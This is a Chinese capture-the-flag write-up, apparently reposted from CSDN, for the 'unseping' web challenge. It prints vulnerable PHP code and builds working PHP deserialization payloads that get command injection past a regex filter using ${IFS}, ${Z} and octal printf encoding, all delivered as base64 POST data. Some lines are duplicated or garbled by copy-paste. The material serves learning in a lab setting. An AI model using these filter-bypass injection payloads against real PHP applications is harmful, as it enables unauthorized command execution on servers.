-
攻防世界-unseping
攻防世界-unseping
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-iPc18GlQ-1666931905094)(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAIAAACQkWg2AAAAAXNSR0IArs4c6QAAAERlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAA6ABAAMAAAABAAEAAKACAAQAAAABAAAAEKADAAQAAAABAAAAEAAAAAA0VXHyAAAB+ElEQVQoFS2SuY7CQBBE8XjMYXMfu6wQIgOJCAmRkBAh/pLfICABEUAIIQEJ4hL3bQ4b9rHeDtrTdk11dbWVer2uqqqiuHw+PRwOh0KhYDDo9Xpt297tdpvNZrVaHY/Hx+Pxfr+fz6d0uVw305RSGLpxN80D5e2maZplWefz2YFy5gCRrusSelsoX98/msZZut1u0FLK1+vFJ84ej0dRFErDMOLxuOQR8gdBWBYqXvSlp9P9/hfI4E0ikYjFYslkUqL7er2CAE6GiYwG0zSRQaaP7y9Ap9Pp/wun04mx+AaaQMPlcgHNzUgkggfEZwACW8bjcSaToW61WtFoNJ/Pd7vdWq3G0Aza6/WQQGdIyZJujiFIRN56vT4cDsVisdlscoC4Wq02Gg14P/bYtlgulzDRHUQul0MYJSy8J8MqhPjghKCEUYxGI6cjDnY6nUqlwh7m83kgEKAbL1kfI0GPhGw2K5kdAuxnhul0OhwOgfb7/VKpBBGS2u02ONRjrt/vVyaTyWAwgGy/3zMMZLDSnT7odByHjnUVCoVUKiW32y0/DFohoAl7BQ2CpYGmZCp2x32QaFHL5fJisWAmAm6ggFBMiQwQBAf8JbMcOZvNnGWBwwTWREa64zU6GRoc9x1vJHOwPmTgND7we7E7LsCHTtBw84+AhgJhvzqqhewBzcvrAAAAAElFTkSuQmCC)]GFSJ1061积分1金币1
18最佳Writeup由 shuita111 提供WriteUP
收藏
反馈
难度:1
方向:Web
题解数:1
解出人数:255
题目来源: 江苏工匠杯
题目描述:
unseping
题目场景:
100%
倒计时: 3时42分15秒
highlight_file(__FILE__); class ease{ private $method; private $args; function __construct($method, $args) { $this->method = $method; $this->args = $args; } function __destruct(){ if (in_array($this->method, array("ping"))) { call_user_func_array(array($this, $this->method), $this->args); } } function ping($ip){ exec($ip, $result); var_dump($result); } function waf($str){ if (!preg_match_all("/(\||&|;| |\/|cat|flag|tac|php|ls)/", $str, $pat_array)) { return $str; } else { echo "don't hack"; } } function __wakeup(){ foreach($this->args as $k => $v) { $this->args[$k] = $this->waf($v); } } } $ctf=@$_POST['ctf']; @unserialize(base64_decode($ctf)); ?>- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
highlight_file(__FILE__); class ease{ private $method; private $args; function __construct($method, $args) { $this->method = $method; $this->args = $args; } function __destruct(){ if (in_array($this->method, array("ping"))) { call_user_func_array(array($this, $this->method), $this->args); } } function ping($ip){ exec($ip, $result); var_dump($result); } function waf($str){ if (!preg_match_all("/(\||&|;| |\/|cat|flag|tac|php|ls)/", $str, $pat_array)) { return $str; } else { echo "don't hack"; } } function __wakeup(){ foreach($this->args as $k => $v) { $this->args[$k] = $this->waf($v); } } } // $ctf=@$_POST['ctf']; // @unserialize(base64_decode($ctf)); $obj=new ease("ls","ls //"); $str=serialize($obj); echo $str,PHP_EOL; $str=str_replace('O:4','O:+4',$str); $str=str_replace(':2:',':3:',$str); echo $str; echo base64_encode($str); //-------------------------------- echo ""; //$a=new ease("ping",array('test point')); $a= new ease("ping",array('pwd')); $b=serialize($a); echo $b; echo base64_encode($b); ?>- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
$a = new ease("ping",array('l${Z}s')); $b=serialize($a); echo $b; echo base64_encode($b); ?> //Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czo2OiJsJHtafXMiO319- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
$a = new ease("ping",array('l${Z}s${IFS}f${Z}lag_1${Z}s_here')); $b=serialize($a); echo $b; echo base64_encode($b); //Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czozMjoibCR7Wn1zJHtJRlN9ZiR7Wn1sYWdfMSR7Wn1zX2hlcmUiO319- 1
- 2
- 3
- 4
- 5
- 6
flag_1s_here/flag_831b69012c67b35f.php
访问空白!
貌似是uncode编码$(printf “\154\163”) 但是好像并不是unicode编码
\154\163怎么就能代替ls了!?
印象中“\”开头的是八进制 这会不会是assic码
\154=4+58+18^2=4+40+64=108 对应assic码”l“
\163=3+68+18^2=3+48+64=115 对应assic码”s“
根据这个思路我写了一个c语言的代码
#includeint main() { /* code */ char site[] = "cat flag_1s_here/flag_831b69012c67b35f.php"; for (int i = 0; i < sizeof site / sizeof site[0]; i++) { printf("\\%o",site[i]); } return 0; } - 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
————————————————
版权声明:本文为CSDN博主「昵称还在想呢」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/shelter1234567/article/details/127337541
#/usr/bin/python3 # /* code */ # char site[] = "cat flag_1s_here/flag_831b69012c67b35f.php"; s="cat flag_1s_here/flag_831b69012c67b35f.php" s1='' #用于得到字符对应的ASCII码,返回值类型为int型 #01-chr():功能:用于将数 (十进制数、二进制数、八进制数或十六进制数) 转化为其对应的字符。比如: for i in s: print(oct(ord(i))) s1=s1+'\\'+str(oct(ord(i)))[2:] print(s1) #运行结果 ┌──(kwkl㉿kwkl)-[~/HODL] └─$ /bin/python3 /home/kwkl/HODL/adworld/web/unseping/c.py 0o143 0o141 0o164 0o40 0o146 0o154 0o141 0o147 0o137 0o61 0o163 0o137 0o150 0o145 0o162 0o145 0o57 0o146 0o154 0o141 0o147 0o137 0o70 0o63 0o61 0o142 0o66 0o71 0o60 0o61 0o62 0o143 0o66 0o67 0o142 0o63 0o65 0o146 0o56 0o160 0o150 0o160 \143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
$(printf “\154\163”)
组合一个poc:
$(printf “\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160”)
a = n e w e a s e ( " p i n g " , a r r a y ( ′ l a = new ease("ping",array('l a=newease("ping",array(′l{Z}s I F S f {IFS}f IFSf{Z}lag_1${Z}s_here’));
a = n e w e a s e ( " p i n g " , a r r a y ( ′ l a = new ease("ping",array('l a=newease("ping",array(′l{Z}s I F S f {IFS}f IFSf{Z}lag_1${Z}s_here’));
a = n e w e a s e ( " p i n g " , a r r a y ( ′ a = new ease("ping",array(' a=newease("ping",array(′(printf${IFS}“\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160”)'));
————————————————
版权声明:本文为CSDN博主「昵称还在想呢」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/shelter1234567/article/details/127337541highlight_file(__FILE__); class ease{ private $method; private $args; function __construct($method, $args) { $this->method = $method; $this->args = $args; } function __destruct(){ if (in_array($this->method, array("ping"))) { call_user_func_array(array($this, $this->method), $this->args); } } function ping($ip){ exec($ip, $result); var_dump($result); } function waf($str){ if (!preg_match_all("/(\||&|;| |\/|cat|flag|tac|php|ls)/", $str, $pat_array)) { return $str; } else { echo "don't hack"; } } function __wakeup(){ foreach($this->args as $k => $v) { $this->args[$k] = $this->waf($v); } } } // $ctf=@$_POST['ctf']; // @unserialize(base64_decode($ctf)); $obj=new ease("ls","ls //"); $str=serialize($obj); echo $str,PHP_EOL; $str=str_replace('O:4','O:+4',$str); $str=str_replace(':2:',':3:',$str); echo $str; echo base64_encode($str); //-------------------------------- echo ""; //$a=new ease("ping",array('test point')); //$a= new ease("ping",array('pwd')); //$a = new ease("ping",array('l${Z}s')); //$a = new ease("ping",array('l${Z}s${IFS}f${Z}lag_1${Z}s_here')); $a = new ease("ping",array('$(printf${IFS}"\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160")')); $b=serialize($a); echo $b; echo base64_encode($b); ?>- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
- 62
Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czozMjoibCR7Wn1zJHtJRlN9ZiR7Wn1sYWdfMSR7Wn1zX2hlcmUiO319
一定要用post方法!
ctf=Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czozMjoibCR7Wn1zJHtJRlN9ZiR7Wn1sYWdfMSR7Wn1zX2hlcmUiO319
Tzo0OiJlYXNlIjoyOntzOjEyOiIAZWFzZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGVhc2UAYXJncyI7YToxOntpOjA7czoxNjk6IiQocHJpbnRmJHtJRlN9IlwxNDNcMTQxXDE2NFw0MFwxNDZcMTU0XDE0MVwxNDdcMTM3XDYxXDE2M1wxMzdcMTUwXDE0NVwxNjJcMTQ1XDU3XDE0NlwxNTRcMTQxXDE0N1wxMzdcNzBcNjNcNjFcMTQyXDY2XDcxXDYwXDYxXDYyXDE0M1w2Nlw2N1wxNDJcNjNcNjVcMTQ2XDU2XDE2MFwxNTBcMTYwIikiO319
————————————————
版权声明:本文为CSDN博主「昵称还在想呢」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/shelter1234567/article/details/127337541————————————————
版权声明:本文为CSDN博主「昵称还在想呢」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/shelter1234567/article/details/127337541 -
相关阅读:
企业申报“专精特新”,对知识产权有哪些要求?
【算法竞赛入门练习题】使用 swap() 函数来实现三个数的排序
as-if-serial与happens-before原则详解
Arduino 控制理论(3)- 如何在 Arduino 中调节 PID 控制器
没有不写注释的程序员,如果有,一定没看过别人的代码?
tcp/ip协议和opc协议对比详解
【EI会议征稿】第七届大数据与应用统计国际学术研讨会(ISBDAS 2024)
L55.linux命令每日一练 -- 第八章 Linux磁盘与文件系统管理命令 -- mkswap和swapon
HTTPS 的加密流程
1.0、什么是软件测试
- 原文地址:https://blog.csdn.net/m0_47210241/article/details/127569376